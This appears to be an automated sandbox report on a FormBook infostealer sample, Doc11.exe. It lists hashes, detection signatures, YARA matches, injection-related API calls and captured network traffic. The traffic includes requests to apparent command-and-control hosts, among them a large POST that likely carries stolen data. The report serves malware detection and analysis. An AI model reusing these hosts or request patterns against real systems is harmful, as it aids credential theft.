Analysis Report Doc11.exe

Overview

General Information

Sample Name: Doc11.exe
Analysis ID: 288546
MD5: f7ad3b59548788a59172b6477a1b83f0
SHA1: 3b042b49ac135f38824de3665a051a7631e98782
SHA256: f22a0b5b12687ae12b9f4d625d82a16562bce5e1b03b7d7372df3813e5afc8e5
Tags: FormBook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Creates an undocumented autostart registry key
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Doc11.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: Doc11.exe Virustotal: Detection: 34%
Source: Doc11.exe ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match File source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Doc11.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.RegAsm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.Doc11.exe.6320000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then pop edi 2_2_00416C41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4x nop then pop edi 6_2_00B16C51

Networking:

HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /dfc/?D8P=3+M06F3PIg4yWAePafKrbwLCVt/5XonsK6D9R8t918UDHllTjs2fMYDw+G4H15oZP3Dg&qL0=gjqP-lQha6A HTTP/1.1 Host: www.chelsescompass.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dfc/?D8P=9M3+mrw2yCLpvsjtVt4xmWYaRC63IF9WI6ouro4nLgjTYgR16zyhTX9CTsO+/cCnLtWf&qL0=gjqP-lQha6A HTTP/1.1 Host: www.snacklabbet.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: LOOPIASE LOOPIASE
Source: Joe Sandbox View ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /dfc/ HTTP/1.1 Host: www.snacklabbet.com Connection: close Content-Length: 409 Cache-Control: no-cache Origin: http://www.snacklabbet.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.snacklabbet.com/dfc/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /dfc/ HTTP/1.1 Host: www.snacklabbet.com Connection: close Content-Length: 185341 Cache-Control: no-cache Origin: http://www.snacklabbet.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.snacklabbet.com/dfc/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Source: unknown DNS traffic detected: queries for: www.chelsescompass.com
Source: unknown HTTP traffic detected: POST /dfc/ HTTP/1.1 Host: www.snacklabbet.com Connection: close Content-Length: 409 Cache-Control: no-cache Origin: http://www.snacklabbet.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.snacklabbet.com/dfc/ Accept-Language: en-US Accept-Encoding: gzip, deflate

E-Banking Fraud:

Yara detected FormBook

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\cscript.exe Dropped file: C:\Users\user\AppData\Roaming\7L8580B-\7L8logri.ini
Source: C:\Windows\SysWOW64\cscript.exe Dropped file: C:\Users\user\AppData\Roaming\7L8580B-\7L8logrv.ini
Malicious sample detected (through community Yara rule)
Source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Doc11.exe Code function: 0_2_05001C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtTerminateProcess,NtUnmapViewOfSection,NtWriteVirtualMemory,NtGetContextThread,NtSetContextThread,NtResumeThread, 0_2_05001C09
Source: C:\Users\user\Desktop\Doc11.exe Code function: 0_2_050000AD NtOpenSection,NtMapViewOfSection, 0_2_050000AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00419CA0 NtCreateFile, 2_2_00419CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00419D50 NtReadFile, 2_2_00419D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00419DD0 NtClose, 2_2_00419DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00419E80 NtAllocateVirtualMemory, 2_2_00419E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00419C9A NtCreateFile, 2_2_00419C9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00419D4A NtReadFile, 2_2_00419D4A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00419DCC NtClose, 2_2_00419DCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00419E7A NtAllocateVirtualMemory, 2_2_00419E7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_03169A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169A20 NtResumeThread,LdrInitializeThunk, 2_2_03169A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169A50 NtCreateFile,LdrInitializeThunk, 2_2_03169A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_03169910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031699A0 NtCreateSection,LdrInitializeThunk, 2_2_031699A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169840 NtDelayExecution,LdrInitializeThunk, 2_2_03169840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_03169860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031698F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_031698F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169710 NtQueryInformationToken,LdrInitializeThunk, 2_2_03169710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169780 NtMapViewOfSection,LdrInitializeThunk, 2_2_03169780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031697A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_031697A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_03169660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031696E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_031696E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169540 NtReadFile,LdrInitializeThunk, 2_2_03169540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031695D0 NtClose,LdrInitializeThunk, 2_2_031695D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169B00 NtSetValueKey, 2_2_03169B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0316A3B0 NtGetContextThread, 2_2_0316A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169A10 NtQuerySection, 2_2_03169A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169A80 NtOpenDirectoryObject, 2_2_03169A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169950 NtQueueApcThread, 2_2_03169950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031699D0 NtCreateProcessEx, 2_2_031699D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169820 NtEnumerateKey, 2_2_03169820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0316B040 NtSuspendThread, 2_2_0316B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031698A0 NtWriteVirtualMemory, 2_2_031698A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0316A710 NtOpenProcessToken, 2_2_0316A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169730 NtQueryVirtualMemory, 2_2_03169730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169770 NtSetInformationFile, 2_2_03169770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0316A770 NtOpenThread, 2_2_0316A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169760 NtOpenProcess, 2_2_03169760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169FE0 NtCreateMutant, 2_2_03169FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169610 NtEnumerateValueKey, 2_2_03169610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169650 NtQueryValueKey, 2_2_03169650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169670 NtQueryInformationProcess, 2_2_03169670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031696D0 NtCreateKey, 2_2_031696D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0316AD30 NtSetContextThread, 2_2_0316AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169520 NtWaitForSingleObject, 2_2_03169520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169560 NtWriteFile, 2_2_03169560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031695F0 NtQueryInformationFile, 2_2_031695F0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C295D0 NtClose,LdrInitializeThunk, 6_2_04C295D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29540 NtReadFile,LdrInitializeThunk, 6_2_04C29540
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29560 NtWriteFile,LdrInitializeThunk, 6_2_04C29560
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C296D0 NtCreateKey,LdrInitializeThunk, 6_2_04C296D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C296E0 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_04C296E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29650 NtQueryValueKey,LdrInitializeThunk, 6_2_04C29650
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29660 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_04C29660
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29610 NtEnumerateValueKey,LdrInitializeThunk, 6_2_04C29610
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29FE0 NtCreateMutant,LdrInitializeThunk, 6_2_04C29FE0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29780 NtMapViewOfSection,LdrInitializeThunk, 6_2_04C29780
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29770 NtSetInformationFile,LdrInitializeThunk, 6_2_04C29770
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29710 NtQueryInformationToken,LdrInitializeThunk, 6_2_04C29710
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29840 NtDelayExecution,LdrInitializeThunk, 6_2_04C29840
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29860 NtQuerySystemInformation,LdrInitializeThunk, 6_2_04C29860
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C299A0 NtCreateSection,LdrInitializeThunk, 6_2_04C299A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29910 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_04C29910
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29A50 NtCreateFile,LdrInitializeThunk, 6_2_04C29A50
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29B00 NtSetValueKey,LdrInitializeThunk, 6_2_04C29B00
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C295F0 NtQueryInformationFile, 6_2_04C295F0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29520 NtWaitForSingleObject, 6_2_04C29520
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C2AD30 NtSetContextThread, 6_2_04C2AD30
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29670 NtQueryInformationProcess, 6_2_04C29670
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C297A0 NtUnmapViewOfSection, 6_2_04C297A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29760 NtOpenProcess, 6_2_04C29760
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C2A770 NtOpenThread, 6_2_04C2A770
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C2A710 NtOpenProcessToken, 6_2_04C2A710
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29730 NtQueryVirtualMemory, 6_2_04C29730
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C298F0 NtReadVirtualMemory, 6_2_04C298F0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C298A0 NtWriteVirtualMemory, 6_2_04C298A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C2B040 NtSuspendThread, 6_2_04C2B040
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29820 NtEnumerateKey, 6_2_04C29820
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C299D0 NtCreateProcessEx, 6_2_04C299D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29950 NtQueueApcThread, 6_2_04C29950
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29A80 NtOpenDirectoryObject, 6_2_04C29A80
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29A00 NtProtectVirtualMemory, 6_2_04C29A00
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29A10 NtQuerySection, 6_2_04C29A10
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C29A20 NtResumeThread, 6_2_04C29A20
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C2A3B0 NtGetContextThread, 6_2_04C2A3B0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B19CA0 NtCreateFile, 6_2_00B19CA0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B19DD0 NtClose, 6_2_00B19DD0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B19D50 NtReadFile, 6_2_00B19D50
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B19E80 NtAllocateVirtualMemory, 6_2_00B19E80
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B19C9A NtCreateFile, 6_2_00B19C9A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B19DCC NtClose, 6_2_00B19DCC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B19D4A NtReadFile, 6_2_00B19D4A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B19E7A NtAllocateVirtualMemory, 6_2_00B19E7A
Detected potential crypto function
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0312B150 appears 45 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 04BEB150 appears 45 times
Sample file is different than original file name gathered from version info
Source: Doc11.exe, 00000000.00000002.196411457.0000000005D60000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamePGzTmRHSQnoDrXlf.bounce.exe4 vs Doc11.exe
Tries to load missing DLLs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Yara signature match
Source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.226890932.0000000001440000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.187918591.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.187738910.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
